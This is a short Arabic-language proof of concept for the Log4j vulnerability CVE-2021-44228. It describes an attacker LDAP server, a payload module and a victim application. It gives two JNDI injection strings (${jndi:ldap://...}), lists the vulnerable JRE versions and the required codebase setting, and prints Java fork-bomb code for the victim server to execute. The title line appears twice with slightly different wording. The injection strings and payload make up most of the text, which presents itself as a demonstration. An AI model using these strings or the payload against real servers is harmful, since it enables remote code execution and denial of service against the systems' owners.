
💣💥💀 إثبات المفهوم: مثال على تشغيل fork-bomb على خادم بعيد بسبب ثغرة CVE-2021-44228
💣💥💀 إثبات المفهوم: مثال على تشغيل fork bomb على خادم بعيد بفضل الثغرة CVE-2021-44228
نقوم بإنشاء خادم LDAP للمهاجم (وحدة server) والذي سيوفر تمثيلات النص والكود (وحدة payload)
نقوم بإنشاء مثال ضحية (وحدة victim) ونمرر إلى Log4j السلسلة إصدار JRE <= 6u211, 7u201, 8u191 و 11.0.1
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
سيحصل تطبيق الضحية من خادم المهاجم على مصفوفة بايت وسيفسرها كسلسلة بديلة أو ككود قابل للتنفيذ (المعامل com.sun.jndi.ldap.object.trustURLCodebase = true)
كمثال، سيكون الكود القابل للتنفيذ هو fork bomb (برنامج يقوم بتشغيل نسخ من نفسه مما يستهلك كل وقت المعالج)
public class ForkBomb {
public static void main(String... args) {
Runtime.getRuntime().exec(new String[] {
"javaw",
"-cp",
System.getProperty("java.class.path"),
"ForkBomb"
});
}
}